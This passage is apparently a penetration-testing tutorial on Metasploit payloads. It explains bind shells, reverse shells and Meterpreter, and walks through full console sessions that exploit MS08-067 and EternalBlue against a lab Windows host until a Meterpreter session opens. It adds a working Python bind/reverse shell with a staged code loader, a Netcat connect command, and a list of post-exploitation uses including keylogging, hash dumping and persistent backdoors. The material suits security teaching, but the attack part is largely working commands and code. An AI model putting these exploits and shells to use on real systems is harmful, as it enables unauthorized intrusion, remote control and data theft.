Using payload modules (4)

This part introduces several common payloads and looks at what each one does from the exploitation side.


bind shell

  A bind shell provides remote shell access to a compromised host. Once a vulnerability on the target has been exploited and the shellcode runs, the payload opens a listening port on the target and attaches a command shell to it, so that another host can keep controlling the machine. The attacker then connects to that port with any TCP client that relays standard input and output, Netcat for example, and drives the shell through it. The model is essentially a Telnet server on the target with a Telnet client on the attacker's side. It fits the cases where the target cannot initiate a connection to the attacker: the tester's machine sits behind NAT, or a firewall between the two blocks connections towards the attacker's IP. The flip side is that the target must accept an inbound connection on the chosen port, which a host firewall or an edge filter will often block, and a new listening port is easy for a defender to spot.


msf5 > use exploit/windows/smb/ms08_067_netapi 
msf5 exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] 192.168.1.14:445 - Automatically detecting the target...

  Metasploit connects to the bind shell on its own, through the payload handler that is integrated with the exploit. You can also write your own shellcode, plant the bind shell with the exploit, and then connect to it with a third-party tool such as Netcat. One caveat when doing that: windows/shell/bind_tcp is a staged payload, a small stager that listens and then waits for the Metasploit handler to send the actual shell code over the connection, so Netcat gets nothing useful out of it. The stageless windows/shell_bind_tcp (note the underscore) carries the whole shell and is the one to pick when you intend to connect with Netcat.

reverse shell

  A reverse shell works the other way round from a bind shell. Instead of binding a port on the target and passively waiting for the attacker to connect, the payload makes the target connect out to the attacker's IP and port (LHOST and LPORT) and hands over a shell on that connection. This suits targets that reach the network through NAT, or that sit behind a firewall so the tester cannot reach them directly from outside: outbound connections are usually allowed where inbound ones are not. The trade-off is mirrored, too. The attacker's listener must be reachable from the target, and the connect-back address and port show up in the target's outbound traffic.


msf5 > use exploit/windows/smb/ms08_067_netapi 
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell
set PAYLOAD windows/shell/bind_hidden_ipknock_tcp  set PAYLOAD windows/shell/reverse_ord_tcp
set PAYLOAD windows/shell/bind_hidden_tcp          set PAYLOAD windows/shell/reverse_tcp
set PAYLOAD windows/shell/bind_ipv6_tcp            set PAYLOAD windows/shell/reverse_tcp_allports
set PAYLOAD windows/shell/bind_ipv6_tcp_uuid       set PAYLOAD windows/shell/reverse_tcp_dns
set PAYLOAD windows/shell/bind_named_pipe          set PAYLOAD windows/shell/reverse_tcp_rc4
set PAYLOAD windows/shell/bind_nonx_tcp            set PAYLOAD windows/shell/reverse_tcp_uuid
set PAYLOAD windows/shell/bind_tcp                 set PAYLOAD windows/shell/reverse_udp
set PAYLOAD windows/shell/bind_tcp_rc4             set PAYLOAD windows/shell_bind_tcp
set PAYLOAD windows/shell/bind_tcp_uuid            set PAYLOAD windows/shell_hidden_bind_tcp
set PAYLOAD windows/shell/reverse_ipv6_tcp         set PAYLOAD windows/shell_reverse_tcp
set PAYLOAD windows/shell/reverse_nonx_tcp         
msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.14     yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.12:4444 

  Note that a reverse payload needs the attacker's address (LHOST) set; it is marked Required, so the exploit will not run without it. LHOST must be an address the target can actually reach, and the line "Started reverse TCP handler on 192.168.1.12:4444" confirms where the listener is waiting for the connect-back. LPORT defaults to 4444; change it if that port is filtered on the path back from the target.
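To make the direction of the connection concrete, here is an added Python illustration of the bind and reverse shells described in the two sections above, together with the staged versus stageless distinction that the payload names encode (windows/shell/bind_tcp versus windows/shell_bind_tcp). It is not Metasploit code: both ends run inside one process on 127.0.0.1, the "stage" is Python source the stub exec()s rather than machine code, the shell only ever runs the echo commands passed to it, and the 4-byte little-endian length prefix is the framing Metasploit's TCP stagers expect before the stage. demo_netcat_vs_staged() shows why Netcat gets nothing back from a staged bind payload.

```python
import socket
import struct
import threading

HOST = "127.0.0.1"  # loopback only; a real payload uses RHOST / LHOST

# The shell proper: read a command line, run it, send the output back.
# A stageless payload carries this code inside itself; a staged payload
# receives it over the wire as the stage. It is Python source here so the
# stub can exec() it; in Metasploit it is position-independent machine code.
STAGE = b'''
import subprocess
reader = conn.makefile("rb")
for line in reader:
    cmd = line.strip().decode()
    if cmd == "exit":
        break
    res = subprocess.run(cmd, shell=True, capture_output=True)
    conn.sendall(res.stdout + res.stderr)   # demo assumes one output line
conn.close()
'''


def recv_exact(conn, n):
    """Read exactly n bytes; capped recv() so a bogus length cannot allocate GBs."""
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(min(n - len(buf), 65536))
        if not chunk:
            raise ConnectionError("peer closed before the stage arrived")
        buf += chunk
    return buf


def stager(conn, staged):
    """Runs on the target once a TCP connection exists, whichever side opened it.
    Staged: read 4-byte LE length, then the stage, then execute it.
    Stageless: the shell code is built in, so just execute it."""
    if staged:
        (n,) = struct.unpack("<I", recv_exact(conn, 4))
        code = recv_exact(conn, n)       # only the msf handler sends this framing
    else:
        code = STAGE
    exec(code.decode(), {"conn": conn})


def bind_stub(srv, staged):
    """Bind shell: the target listens and waits for the attacker to connect in."""
    conn, _ = srv.accept()
    srv.close()
    try:
        stager(conn, staged)
    except ConnectionError:
        conn.close()


def reverse_stub(lhost, lport, staged):
    """Reverse shell: the target connects out to the attacker's LHOST:LPORT."""
    stager(socket.create_connection((lhost, lport)), staged)


def drive(conn, staged, commands):
    """Attacker side: ship the stage if the payload is staged, then run the
    commands and collect one output line per command."""
    if staged:
        conn.sendall(struct.pack("<I", len(STAGE)) + STAGE)
    reader = conn.makefile("rb")
    outputs = []
    for cmd in commands:
        conn.sendall(cmd.encode() + b"\n")
        outputs.append(reader.readline().decode().strip())
    conn.sendall(b"exit\n")
    conn.close()
    return outputs


def listener():
    srv = socket.socket()
    srv.bind((HOST, 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def demo_bind(staged, commands):
    """Attacker connects in, as msf's handler or 'nc <target> <LPORT>' would."""
    srv, port = listener()
    t = threading.Thread(target=bind_stub, args=(srv, staged), daemon=True)
    t.start()
    out = drive(socket.create_connection((HOST, port)), staged, commands)
    t.join(5)
    return out


def demo_reverse(staged, commands):
    """Attacker listens on LHOST:LPORT, the 'Started reverse TCP handler' line."""
    srv, lport = listener()
    t = threading.Thread(target=reverse_stub, args=(HOST, lport, staged), daemon=True)
    t.start()
    conn, _ = srv.accept()
    srv.close()
    out = drive(conn, staged, commands)
    t.join(5)
    return out


def demo_netcat_vs_staged(timeout=1.0):
    """Netcat against a *staged* bind payload: the stub reads the typed command
    as a stage length and waits for bytes that never come, so nothing returns.
    Returns True when the attacker's read times out."""
    srv, port = listener()
    threading.Thread(target=bind_stub, args=(srv, True), daemon=True).start()
    conn = socket.create_connection((HOST, port))
    conn.settimeout(timeout)
    conn.sendall(b"echo hi\n")
    try:
        conn.recv(4096)
        return False
    except socket.timeout:
        return True
    finally:
        conn.close()


if __name__ == "__main__":
    print(demo_bind(False, ["echo bind-stageless"]))
    print(demo_reverse(True, ["echo reverse-staged"]))
    print("netcat vs staged payload hangs:", demo_netcat_vs_staged())
```

Against the real target in the session above, the Netcat equivalent of demo_bind with a stageless payload is nc 192.168.1.14 4444 after setting windows/shell_bind_tcp (LPORT defaults to 4444 for the bind payloads as well); with the staged windows/shell/bind_tcp only the Metasploit handler, which knows to send the length-prefixed stage first, gets a usable shell.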

meterpreter

  Meterpreter is an advanced, stealthy, multi-purpose and dynamically extensible payload. It is injected into the memory of a process on the target as a DLL that never exists as a file on disk, and it can load further extensions and scripts while it runs. In the post-exploitation phase this dynamic loading greatly widens what the tester can do: privilege escalation, dumping and saving system account hashes, keylogging, installing a persistent backdoor, enabling remote desktop, and so on. By default the Meterpreter command channel is encrypted. In the session below the module has already been switched to exploit/windows/smb/ms17_010_eternalblue, and the payload is chosen by its index in the show payloads listing, which here resolves to windows/x64/meterpreter/reverse_tcp.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD 15
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.1.14     yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.1.12:4444 
[+] 192.168.1.14:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.14:445 - Connecting to target for exploitation.
[+] 192.168.1.14:445 - Connection established for exploitation.
[+] 192.168.1.14:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.14:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.14:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.14:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.1.14:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.1.14:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.14:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.14:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.14:445 - Starting non-paged pool grooming
[+] 192.168.1.14:445 - Sending SMBv2 buffers
[+] 192.168.1.14:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.14:445 - Sending final SMBv2 buffers.
[*] 192.168.1.14:445 - Sending last fragment of exploit packet!
[*] 192.168.1.14:445 - Receiving response from exploit packet
[+] 192.168.1.14:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.14:445 - Sending egg to corrupted connection.
[*] 192.168.1.14:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:49398) at 2021-02-01 12:13:06 +0800
[+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > dir
Listing: C:\Windows\system32
